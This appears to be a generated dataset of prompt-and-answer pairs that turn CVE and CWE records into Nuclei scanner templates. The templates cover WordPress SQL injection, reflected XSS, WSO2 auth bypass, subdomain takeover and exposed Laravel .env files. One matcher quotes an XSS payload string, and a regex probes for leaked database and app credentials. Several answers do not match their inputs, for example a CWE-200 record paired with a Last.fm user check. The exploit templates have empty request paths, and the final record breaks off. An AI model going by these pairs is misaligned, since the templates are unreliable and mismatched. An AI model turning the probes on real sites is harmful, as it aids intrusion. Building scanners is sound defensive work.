"name": "LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection",
"author": "s4e-io",
"severity": "critical",
"description": "The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018term_id\u2019 parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n",
"tags": [
"cve",
"cve2024",
"wp",
"wp-plugin",
"wordpress",
"sqli",
"learnpress",
"vkev",
"vuln"
],
"reference": [
"https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd",
"https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-4265-unauthenticated-time-based-sql-injection",
"https://nvd.nist.gov/vuln/detail/CVE-2024-4434"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"duration_2 >= 6",
"status_code_2 == 200",
"contains(content_type,\"application/json\")",
"contains_all(body_2,\"No courses were found\",\"success\")"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2024-4434",
"timestamp": "2025-11-13T15:15:46.845720Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "azure-takeover-detection",
"severity": "high",
"tags": [
"dns",
"takeover",
"azure",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "microfocus-filr-panel",
"info": {
"name": "Micro Focus Filr Login Panel - Detect",
"author": "ritikchaddha,righettod",
"severity": "info",
"description": "Micro Focus Filr login panel was detected.",
"tags": [
"panel",
"microfocus",
"filr",
"detect",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/filr/login",
"{{BaseURL}}/login"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"Micro Focus Filr",
"Filr Appliance"
],
"condition": "or"
},
{
"type": "status",
"status": [
404,
200
],
"condition": "or"
}
],
"matchers_condition": "and",
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-microfocus-filr-panel",
"timestamp": "2025-11-13T15:15:48.818681Z"
}
}
|
rcdevs-webadm-panel
|
[CANONICAL_RECORD]
{
"cve_id": "rcdevs-webadm-panel",
"summary": "RCDevs WebADM Login Panel was detected.\n. This template detects RCDevs WebADM Panel - Detect by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}",
"{{BaseURL}}/webapps/index.php",
"{{BaseURL}}/websrvs/index.php"
],
"indicators": [
"WebADM",
"RCDevs Security",
"www.rcdevs.com"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "alibaba-cloud-code-env",
"severity": "info",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "rcdevs-webadm-panel",
"info": {
"name": "RCDevs WebADM Panel - Detect",
"author": "righettod",
"severity": "info",
"description": "RCDevs WebADM Login Panel was detected.\n",
"tags": [
"panel",
"rcdevs",
"webadm",
"login",
"detect",
"discovery"
],
"reference": [
"https://www.rcdevs.com/solutions/"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}",
"{{BaseURL}}/webapps/index.php",
"{{BaseURL}}/websrvs/index.php",
"{{BaseURL}}/admin/login_uid.php"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"WebADM",
"RCDevs Security",
"www.rcdevs.com"
],
"condition": "and"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and",
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-rcdevs-webadm-panel",
"timestamp": "2025-11-13T15:15:49.128242Z"
}
}
|
CWE-404
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-404",
"summary": "The product does not release or incorrectly releases a resource before it is made available for re-use. When a resource is created or allocated, the developer is responsible for properly releasing the resource as well as accounting for all potential paths of expiration or invalidation, such as a set period of time or revocation.",
"affected_products": [],
"paths": [],
"indicators": [
"invalid"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "fbi-seized-nameserver",
"severity": "info",
"tags": [
"dns",
"ns",
"darkweb",
"fbi",
"seized",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "azure-takeover-detection",
"severity": "high",
"tags": [
"dns",
"takeover",
"azure",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "elasticbeanstalk-takeover",
"info": {
"name": "ElasticBeanstalk Subdomain Takeover Detection",
"author": "philippedelteil,rotemreiss,zy9ard3,joaonevess",
"severity": "high",
"description": "ElasticBeanstalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it.",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"reference": [
"https://github.com/EdOverflow/can-i-take-over-xyz/issues/147",
"https://twitter.com/payloadartist/status/1362035009863880711",
"https://www.youtube.com/watch?v=srKIqhj_ki8"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-elasticbeanstalk-takeover",
"timestamp": "2025-11-13T15:15:39.530614Z"
}
}
|
CVE-2024-13322
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2024-13322",
"summary": "The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to SQL Injection via the 'a_id' parameter in all versions up to, and including, 4.88 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",
"affected_products": [
{
"vendor": "scripteo",
"product": "ads_pro",
"version_range": "< 4.89"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2023-2640",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"packetstorm",
"kernel",
"ubuntu",
"linux",
"privesc",
"local",
"canonical",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3bcb60a8-220f-45a4-a9a9-10f64acf470c?source=cve",
"snippet": "PoC available at https://www.wordfence.com/threat-intel/vulnerabilities/id/3bcb60a8-220f-45a4-a9a9-10f64acf470c?source=cve"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2024-13322",
"info": {
"name": "Ads Pro Plugin <= 4.88 - Unauthenticated SQL Injection",
"author": "iamnoooob,rootxharsh,pdresearch",
"severity": "high",
"description": "The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to SQL Injection via the 'a_id' parameter in all versions up to, and including, 4.88 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n",
"tags": [
"cve",
"cve2024",
"sqli",
"time-based-sqli",
"wp",
"wp-plugin",
"wordpress",
"vuln"
],
"reference": [
"https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ap-plugin-scripteo/ads-pro-plugin-multi-purpose-wordpress-advertising-manager-488-unauthenticated-sql-injection",
"https://codecanyon.net/item/ads-pro-plugin-multipurpose-wordpress-advertising-manager/10275010",
"https://www.wordfence.com/threat-intel/vulnerabilities/id/3bcb60a8-220f-45a4-a9a9-10f64acf470c?source=cve"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"clicks",
"weekly_views",
"labels"
],
"condition": "and"
},
{
"type": "dsl",
"dsl": [
"duration>=7"
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2024-13322",
"timestamp": "2025-11-13T15:15:46.252626Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "lastfm",
"info": {
"name": "Last.fm User Name Information - Detect",
"author": "princechaddha,rxerium",
"severity": "info",
"description": "Last.fm user name information check was conducted.",
"tags": [
"osint",
"osint-social",
"lastfm",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"https://last.fm/user/{{user}}"
],
"matchers": [
{
"type": "status",
"status": [
200
]
},
{
"type": "word",
"part": "body",
"words": [
"Music Profile | Last.fm"
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-lastfm",
"timestamp": "2025-11-13T15:15:51.898940Z"
}
}
|
CWE-522
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-522",
"summary": "The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.",
"affected_products": [],
"paths": [],
"indicators": [
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "azure-takeover-detection",
"severity": "high",
"tags": [
"dns",
"takeover",
"azure",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "laravel-env",
"info": {
"name": "Laravel - Sensitive Information Disclosure",
"author": "pxmme1337,dwisiswant0,geeknik,emenalf,adrianmf",
"severity": "high",
"description": "A Laravel .env file was discovered, which stores sensitive information like database credentials and tokens. It should not be publicly accessible.\n",
"tags": [
"config",
"exposure",
"laravel",
"vuln"
],
"reference": [
"https://laravel.com/docs/master/configuration#environment-configuration",
"https://stackoverflow.com/questions/38331397/how-to-protect-env-file-in-laravel"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}{{paths}}"
],
"matchers": [
{
"type": "regex",
"part": "body",
"regex": [
"(?mi)^APP_(NAME|ENV|KEY|DEBUG|URL|PASSWORD)=",
"(?mi)^DB_(HOST|PASSWORD|DATABASE)="
],
"condition": "or"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-laravel-env",
"timestamp": "2025-11-13T15:15:49.739182Z"
}
}
|
CVE-2021-24876
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2021-24876",
"summary": "The Registrations for the Events Calendar WordPress plugin before 2.7.5 does not escape the v parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting",
"affected_products": [
{
"vendor": "roundupwp",
"product": "registrations_for_the_events_calendar",
"version_range": "< 2.7.5"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2020-0646",
"severity": "critical",
"tags": [
"cve",
"cve2020",
"net-framework",
"sharepoint",
"microsoft",
"packetstorm",
"rce",
"kev",
"oast",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://wpscan.com/vulnerability/e77c2493-993d-418d-9629-a1f07b5a2b6f",
"snippet": "PoC available at https://wpscan.com/vulnerability/e77c2493-993d-418d-9629-a1f07b5a2b6f"
},
{
"source": "nvd",
"url": "https://wpscan.com/vulnerability/e77c2493-993d-418d-9629-a1f07b5a2b6f",
"snippet": "PoC available at https://wpscan.com/vulnerability/e77c2493-993d-418d-9629-a1f07b5a2b6f"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2021-24876",
"info": {
"name": "Registrations for The Events Calendar < 2.7.5 - Authenticated Reflected Cross-Site Scripting",
"author": "popcorn94",
"severity": "medium",
"description": "The Registrations for the Events Calendar WordPress plugin before 2.7.5 does not escape the v parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting\n",
"tags": [
"cve",
"cve2021",
"wordpress",
"wpscan",
"wp-plugin",
"wp",
"registrations-for-the-events-calendar",
"xss",
"authenticated",
"vkev",
"vuln"
],
"reference": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-24876",
"https://wpscan.com/vulnerability/e77c2493-993d-418d-9629-a1f07b5a2b6f/"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"status_code == 302",
"contains(header, \"wordpress_logged_in\")"
],
"condition": "and"
}
]
},
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains_all(body,\"style=animation-name:rotation onanimationstart=alert(document.domain)//\", \"<input type=\\\"hidden\\\" name=\\\"v\\\"\",\"registrations-for-the-events-calendar\")",
"contains(content_type, \"text/html\")",
"status_code == 200"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 2,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2021-24876",
"timestamp": "2025-11-13T15:15:42.956416Z"
}
}
|
rds-backup-enable
|
[CANONICAL_RECORD]
{
"cve_id": "rds-backup-enable",
"summary": "Ensure that your Amazon RDS database instances have automated backups enabled for point-in-time recovery.\n",
"affected_products": [],
"paths": [],
"indicators": [
"RDS Automated Backup Check",
"detected"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "rds-backup-enable",
"info": {
"name": "RDS Automated Backup Check",
"author": "princechaddha",
"severity": "high",
"description": "Ensure that your Amazon RDS database instances have automated backups enabled for point-in-time recovery.\n",
"tags": [
"cloud",
"devops",
"aws",
"amazon",
"rds",
"aws-cloud-config"
],
"reference": [
"https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithAutomatedBackups.html"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-rds-backup-enable",
"timestamp": "2025-11-13T15:15:37.929541Z"
}
}
|
CVE-2025-5605
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2025-5605",
"summary": "An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure.\n\nThe known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.",
"affected_products": [],
"paths": [],
"indicators": [
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2023-49105",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"code",
"owncloud",
"auth-bypass",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [],
"matcher_types": [
"dsl",
"word"
]
}
]
},
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2025-5605",
"info": {
"name": "WSO2 Management Console - Authentication Bypass",
"author": "DhiyaneshDK",
"severity": "medium",
"description": "An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure. The known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.\n",
"tags": [
"cve",
"cve2025",
"wso2",
"auth-bypass"
],
"reference": [
"https://blog.lexfo.fr/wso2.html",
"https://nvd.nist.gov/vuln/detail/CVE-2025-5605",
"https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4115/"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"words": [
"Memory Statistics",
"Collection Usage"
],
"condition": "and"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2025-5605",
"timestamp": "2025-11-13T15:15:47.594666Z"
}
}
|
blackworm-malware
|
[CANONICAL_RECORD]
{
"cve_id": "blackworm-malware",
"summary": "Blackworm Malware - Detect. This template detects Blackworm Malware - Detect by checking specific patterns and responses.",
"affected_products": [],
"paths": [],
"indicators": [
"Blackworm Malware - Detect",
"detected"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "alibaba-cloud-code-env",
"severity": "info",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "blackworm-malware",
"info": {
"name": "Blackworm Malware - Detect",
"author": "daffainfo",
"severity": "info",
"description": "Blackworm Malware - Detect",
"tags": [
"malware",
"file"
],
"reference": [
"https://github.com/Yara-Rules/rules/blob/master/malware/MALW_BlackWorm.yar"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-blackworm-malware",
"timestamp": "2025-11-13T15:15:39.928765Z"
}
}
|
CVE-2021-41192
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2021-41192",
"summary": "Redash is a package for data visualization and sharing. If an admin sets up Redash versions 10.0.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. This issue only affects installations where the `REDASH_COOKIE_SECRET or REDASH_SECRET_KEY` environment variables have not been explicitly set. This issue does not affect users of the official Redash cloud images, Redash's Digital Ocean marketplace droplets, or the scripts in the `getredash/setup` repository. These instances automatically generate unique secret keys during installation. One can verify whether one's instance is affected by checking the value of the `REDASH_COOKIE_SECRET` environment variable. If it is `c292a0a3aa32397cdb050e233733900f`, should follow the steps to secure the instance, outlined in the GitHub Security Advisory.",
